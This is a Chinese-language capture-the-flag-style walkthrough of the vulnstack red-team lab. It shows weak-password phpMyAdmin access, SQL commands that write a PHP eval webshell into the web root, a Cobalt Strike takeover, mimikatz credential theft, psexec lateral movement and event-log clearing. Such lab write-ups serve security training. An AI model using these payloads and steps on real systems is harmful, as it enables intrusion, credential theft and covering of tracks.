内网靶场1 – 作者:sffgvdgdx

今天测试的靶场是vulnstack红队第一个靶场，好废话不多说，直接开始吧！

靶场下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

环境搭建：

windows7需要添加一张网卡，总共两张网卡，一张连接外网设置为NAT，一张连接本地域的设置为仅主机模式。

其他两台主机都设置为仅主机模式。kali攻击机设为NAT。

配好后登录win7主机，在c盘下打开PHPstudy并启动。我这里遇到个问题就是启动不了，直接报错。

解决方法是重新到phpstudy官网再下一个程序，如下图，下载第二个，把原来的web目录替换就行了。

下面就可以渗透了，先用nmap扫下端口，发现开着80和3306。

直接访问ip地址，出现php探针页面，下面有个测试数据库账号,root root 就可直接登录。

目录扫描发现PHPmyadmin，访问网址用弱口令进入。下面用数据库日志getshell：

在sql命令中分别输入：

show variables like ‘%general%’;查看当前日志的默认地址，复制下来后面要用。
set global general_log = on; 打开日志
set global general_log_file =’D:/phpstudy/web/shell.php’; 设置日志的存储地址，设置的地址为刚刚复制的地址，写在web路径下，后缀名改为php
select ‘<?php @eval($_POST[‘cmd’]);?>’;查询写入日志
然后直接连接，执行whoami，发现是管理员权限。

下一步是转移到cs，进行内网渗透。

点击scripted web攻击，这样做的好处是不用上传文件。

配置主机地址和监听都为cs服务器地址，端口都为80。

然后直接在蚁剑中运行生成的pyload,目标机就直接上线。再进行域信息的收集。

先执行命令sleep 1    设置命令执行延长时间为1s。

然后执行shell systeminfo 收集主机信息，发现在god域。

然后执行net view 看域里面有多少主机。

然后执行shell net user /domain 看域里有多少用户。

信息收集完后有两张方式抓取密码，win7可以直接用mkz抓取明文密码，右键目标机器，执行-》run mimikakz。

administrator就是域管账户，成功抓取到域管的密码，有了域管密码之后域里所有机器都可以登了。

得到域管密码后就可以横向渗透了，点击下面的图标，就有刚收集的域主机目标。

右键名字为owa的主机，点击jump-》psexec执行psexec。

第一栏选择刚刚收集到域管账号密码

监听器需要设置一个类型为beacon SMB的监听器，会话需要选择一台已经获得权限的主机，这里直接选win7，稍等一会就会直接弹回来。另一台主机也一样。

最后可以进行痕迹清理，推荐一款插件https://github.com/QAX-A-Team/EventLogMaster可直接清理日志。

还有其他漏洞，感兴趣的话可以自己去寻找。

来源：freebuf.com 2021-08-01 19:55:16 by: sffgvdgdx